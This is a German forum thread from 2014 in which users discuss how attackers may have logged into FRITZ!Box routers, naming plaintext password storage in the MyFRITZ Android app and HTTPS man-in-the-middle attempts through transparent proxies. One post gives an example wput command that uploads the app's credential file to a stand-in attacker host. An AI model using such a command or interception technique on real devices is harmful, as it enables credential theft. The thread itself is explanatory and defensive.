- Anzeige -

Fritz.Box wurde gehackt

In diesem Forum geht es um die Router für Kabel Internet FRITZ!Box 6320, FRITZ!Box 6340, FRITZ!Box 6360 und FRITZ!Box 6490 der Firma AVM.

Re: Fritz.Box wurde gehackt

Beitragvon tq1199 » 07.02.2014, 10:35

toomore hat geschrieben:MyFritz Account gelöscht ...

Ja, ... verstehe.
toomore hat geschrieben: ... das Telefon physikalisch von der Fritzbox abgezogen.

BTW: Der Angreifer hat nicht dein Telefon benutzt.
Kannst Du im Log deiner FritzBox sehen, von welcher externen (öffentlicher) IP-Adresse, der Angreifer sich auf deiner FritzBox angemeldet hat?

EDIT:

Wenn Du diese externe (öffentliche) IP-Adresse hast, dann erstatte Anzeige gegen denjenigen, der diese externe IP-Adresse am ... (siehe Datum und Uhrzeit im Log deiner FritzBox) verwendet hat.

EDIT 2:

Benutzt Du evtl. Fritz!Apps von AVM oder fremd, auf deinem Smartphone/Tablet für deine FritzBox?
Office Internet & Phone 50, AVM FRITZ!Box 6360 Cable (kbw) - FRITZ!OS 06.52 - , an Arris-CMTS, zusätzlich eine feste (statische, nicht per DHCP) IPv4-Adresse für meinen Server, am Bridge-Anschluss (kein Bridge-Modus, FB6360-cable wird ohne feste IPv4-Adresse als Router verwendet.)
Konfigurationsdatei der FritzBox: b2b-staticip1_50000_5000_ipv4_sip_wifi-on.bin
NTP_Provider_Interface_Spec_Unitymedia

AVM - IPv6 technical note
tq1199
Glasfaserstrecke
 
Beiträge: 1265
Registriert: 07.02.2014, 10:05

Re: Fritz.Box wurde gehackt

Beitragvon SpaceRat » 07.02.2014, 11:11

Ich schließe mich zunehmend der Haltung an, daß hier genau gar nichts gehackt wurde.

Soweit das zu überblicken ist, haben sich die Angreifer schnurstracks mit den richtigen Zugangsdaten eingeloggt und nicht geknobelt und probiert.
Die wahrscheinlichste Variante ist also, daß die Opfer ihnen die Daten auf dem Silbertablett, zumindest einem versilberten, geliefert haben.

Es könnte sich um irgendeine sensationell wichtige App handeln, die unbedingt Zugang zur Fritz!Box braucht und die Zugangsdaten dann - sicher ist sicher, so vergißt sie keiner ;) - dem App-Anbieter zuspielt. Auch möglich wäre, daß eine weitere App Daten ausliest.

Schauen wir doch mal nach:
MyFRITZ!App

Man beachte:
Bild

Also alles was man zum Glück braucht.

Und das finden wir dann auch im Klartext auf dem Smartphone wieder:
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="BoxName">FRITZ!Box Fon WLAN 7390</string>
...
<string name="Password">Passwort_im_Klartext</string>
...
<string name="Adresse">labersuelzrhabarber.myfritz.net</string>
<string name="Boxname">FRITZ!Box Fon WLAN 7390</string>
<int name="Port" value="123" />
<string name="Username">Otto Opfer</string>
<boolean name="AnonymousLogin" value="true" />
<boolean name="SingleSignOn" value="true" />
</map>


Jetzt fehlt nur noch eine Version vom Quiz-Duell oder Weißdergeierwas, die nicht nur gecracked, sondern auch noch etwas "ergänzt" wurde ...
Receiver/TV:
  • Vu+ Duo² 4xS2 / OpenATV 5.3@Samsung 50" Plasma
  • AX Quadbox HD2400 2xS2 / OpenATV 6.0@Samsung 32" TFT
  • 2xVu+ Solo² / OpenATV 6.0
  • DVBSky S2-Twin PCIe@SyncMaster T240HD (PC)
  • TechniSat SkyStar HD2@17" (2.PC)
Pay-TV: Schwarzfunk, Redlight Elite Mega HD, Brazzers, XXL, HD-, Sky
Fon: VF Komfort-Classic (ISDN), Siemens S79H+S1+Telekom Modula+Siedle DoorCom Analog@F!B 7390
Internet: UM 1play 100 / Cisco EPC3212+Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)
Bild
Benutzeravatar
SpaceRat
Kabelkopfstation
 
Beiträge: 2614
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen

Re: Fritz.Box wurde gehackt

Beitragvon cemetery » 07.02.2014, 11:17

Das untermauert dann genau den Verdacht den ich gestern auch schon ausgesprochen habe. :super:
cemetery
Kabelneuling
 
Beiträge: 24
Registriert: 03.01.2014, 20:39

Re: Fritz.Box wurde gehackt

Beitragvon SpaceRat » 07.02.2014, 11:24

Und das ist dann der ganze Hack:
wput /data/data/de.avm.android.myfritz/shared_prefs/de.avm.android.myfritz_preferences.xml ftp://send.me.all.your.data.cn/Project_MyFritz/<irgendeine ZufallsID>.xml

Statt wput tut's auch so ziemlich alles andere.

Einziges Problem: Hierfür braucht die App man root-Zugriff
Benutzeravatar
SpaceRat
Kabelkopfstation
 
Beiträge: 2614
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen

Re: Fritz.Box wurde gehackt

Beitragvon planethas » 07.02.2014, 12:03

Zu den ganzen Vermutungen hier kann ich sagen, dass ich keine Zugangsdaten zu dieser Box in einer App hinterlegt habe/hatte.

Zu den Aussagen, HTTPS sei sicher möchte ich mal ein einfach ein paar Fakten in den Raum werfen.

Natürlich ist das HTTPS Protokoll mit den gängigen Standards Sicher, sofern die Zertifikatsquelle und/oder der Herausgeber des Zertifikats vertauenswürdig ist.

Habt Ihr auf eurer Fritzbox ein Öffentliches Zertifikat installiert oder habt das Selfsign Fritzbox Zertifikat auf jedem System von dem Ihr aus auf die Box zugreift vorher persönlich von der Box auf das jenige System übertragen und im Zertifikatsspeicher des Geräts als vertrauenswürdiges Zertifikat hinterlegt?

Oder wissen hier einfach einige nicht, dass auch bei HTTPS Man-In-The-Middle möglich ist. Sofern man nicht min. den Thumbprint des Zertifikats mit dem Original vergleicht, ist ein Selfsign Zertifikat keine Hürde.

Es ist ein einfaches im Stream das Zertifikat zu tauschen und alle Daten im Klartext mitzulesen. Das größere Problem hierbei ist es, den Datenstrom überhaupt so zu leiten/abzugreifen, dass mann an die Daten kommt. Aber auch dies ist mittels ARP Spoofing in selben Netz möglich, wobei gängige Firmware auf Switches dies erkennt und blockiert.

Aber wer weiß schon, welche neue Spoofing Methode die evtl nutzen um den Datenstrom abzugreifen/umzuleiten etc.
Zuletzt geändert von planethas am 07.02.2014, 12:08, insgesamt 1-mal geändert.
planethas
Kabelneuling
 
Beiträge: 8
Registriert: 31.01.2014, 23:53

Re: Fritz.Box wurde gehackt

Beitragvon SpaceRat » 07.02.2014, 12:07

Ohne root ist übrigens immer noch ein Mitschnitt einer Anmeldung möglich, dazu braucht man lediglich einen transparenten https-Proxy (Charles, mitmproxy).

Aufgrund der kranken (Sicherheits!-)Denke von manchen Entwicklern ist es nämlich auf Androiden so gut wie unmöglich, für solche Zugriffe mit Zertifikaten zu arbeiten:
Wer schon mal versucht hat, ein Zertifikat auf einem Androiden zu installieren, wird das in der Regel schnell wieder gelassen haben, weil er dann von Android dazu gezwungen wird, statt des einfachen "Wischens" mindestens eine Entsperrgeste einzustellen, was früher oder später nervt.
Da sich nun die Fritz!Box ihr Zertifikat aufgrund flexibler URL/IP selber erzeugen muß/müßte und das nicht einfach so eben von einer standardmäßig vorhanden Root Authority signieren lassen kann, kann die MyFritz!App gar keine brauchbare Überprüfung des Zertifikats durchführen und liefert daher die Daten auch durch einen Man-In-The-Middle-Proxy ab.

HTTPS bringt nämlich nur dann etwas, wenn die Zertifikate auch überprüft werden:
Loggt man sich einfach mal per https auf seinem NAS oder E2-Receiver o.ä. ein, dann wird man feststellen, daß man von Chrome, Firefox, IE etc. gewarnt wird, daß sich die Authentizität des Zertifikates nicht überprüfen läßt (Logisch, denn dem System ist der Aussteller nicht bekannt).

Auf dem PC läßt sich das Problem nun ganz einfach beheben:
Wenn man überprüft hat, daß die Namensauflösung auch wirklich auf den eigenen NAS etc. zeigt und das dem Browser angebotene Zertifikat in Bezug auf den Fingerprint mit dem selber erzeugten übereinstimmt, dann installiert man es einfach. Danach sieht man jederzeit am grünen oder roten bzw. durchgestrichenen "https", ob das Zertifikat nun gültig ist oder eben nicht. Selbst wenn ein Dritter ein Zertifikat für die Adresse erzeugt, unter der wir den NAS o.ä. ansprechen, wäre es auch noch lange nicht das selbe Zertifikat und somit ebenfalls ungültig.

Nun wäre es natürlich auch sinnvoll, diese Zertifikate auf dem Smartphone zu installieren, damit man gerade und insbesondere unterwegs sicher sein kann, daß man seine Anmeldedaten in das richtige (eigene) System kloppt und nicht irgendeines, das man gerade vorgesetzt bekommt (Und so ein transparenter Proxy ist eben auch ein solches, HTTPS-MITM-Angriffe sind nämlich prinzipiell zum Scheitern verurteilt, wenn der Benutzer bzw. die App auf die Korrektheit der Zertifikate achtet, ein MITM kann nämlich kein gültiges sondern bestenfalls ein ähnliches erzeugen! ...) und eben das verhindert Android und das ausgerechnet aus "Sicherheitsgründen".

Und aus diesem Grund können dann eben auch die Fritz!Apps gar keine wirkliche Überprüfung durchführen und sind somit anfällig für MITM-Angriffe ... zum Wohle der Sicherheit!
Benutzeravatar
SpaceRat
Kabelkopfstation
 
Beiträge: 2614
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen

Re: Fritz.Box wurde gehackt

Beitragvon SpaceRat » 07.02.2014, 12:18

planethas hat geschrieben:Habt Ihr auf eurer Fritzbox ein Öffentliches Zertifikat installiert oder habt das Selfsign Fritzbox Zertifikat auf jedem System von dem Ihr aus auf die Box zugreift vorher persönlich von der Box auf das jenige System übertragen und im Zertifikatsspeicher des Geräts als vertrauenswürdiges Zertifikat hinterlegt?

Ich ja :)

Und für alle anderen Geräte habe ich auch entsprechende Zertifikate selber erzeugt ...

planethas hat geschrieben:Aber wer weiß schon, welche neue Spoofing Methode die evtl nutzen um den Datenstrom abzugreifen/umzuleiten etc.

Dafür reicht eine ... Fritz!Box ... Du schiebst einfach einen transparenten https-Proxy unter.

Da die Fritz!Apps die Zertifikate nicht prüfen (können) und wohl auch ein Großteil der Benutzer das nicht tut, ist das eine Kleinigkeit.

Ein MITM-Angriff auf https ist aber vom Grundsatz her unmöglich.
Möglich wird er erst, wenn man die Vorsichtsregeln, also das durchgestrichene "https", in der URL ignoriert oder die Zertifikate an sich Müll sind. Dann nutzt man aber im Prinzip eben auch kein https mehr, sondern nur http.
Benutzeravatar
SpaceRat
Kabelkopfstation
 
Beiträge: 2614
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen

Re: Fritz.Box wurde gehackt

Beitragvon planethas » 07.02.2014, 12:37

Oder wie schon des öffteren, sind evtl. wieder welche in einer CA "eingebrochen" und haben sich ein paar Zertifikate ausgestellt. Dann merkt es auch niemand.

Aber ohne Glaskugel kommen wir mit solchen Theorien nicht zum Ziel.
planethas
Kabelneuling
 
Beiträge: 8
Registriert: 31.01.2014, 23:53

Re: Fritz.Box wurde gehackt

Beitragvon johnripper » 07.02.2014, 13:44

planethas hat geschrieben:Zu den ganzen Vermutungen hier kann ich sagen, dass ich keine Zugangsdaten zu dieser Box in einer App hinterlegt habe/hatte.

Danke für die Aussage.
Ich hätte auch auf irgendeine APP getippt.

Dir kann man nur raten Strafanzeige zu erstatten und die Daten von der Box soweit wie möglich zu sichern.
Ferner würde ich mich an AVM wenden.

Edit: Und checke nach der Anleitung von AMV ob IP Telefone eingerichtet sind bzw. schließe den Fernzugang.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50
johnripper
Übergeordneter Verstärkerpunkt
 
Beiträge: 834
Registriert: 06.02.2014, 20:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitragvon koax » 07.02.2014, 14:21

Arnie-75 hat geschrieben:Was stand denn im LOG bzw. unter SYSTEM, als sich der Angreifer angemeldet hat? Wenn ich mich übers Internet anmelde steht da z.B.
"Anmeldung des Benutzers MeinName an der FRITZ!Box Benutzeroberfläche von IP-Adresse xx.143.xxx.xxx"


Wer sich in die Benutzeroberfläche der Fritzbox eingelogt hat kann auch das Protokoll löschen.
Benutzeravatar
koax
Kabelkopfstation
 
Beiträge: 3932
Registriert: 09.12.2007, 11:43
Wohnort: Köln

VorherigeNächste

Zurück zu FRITZ!Box für Kabel Internet

Wer ist online?

Mitglieder in diesem Forum: Baidu [Spider] und 1 Gast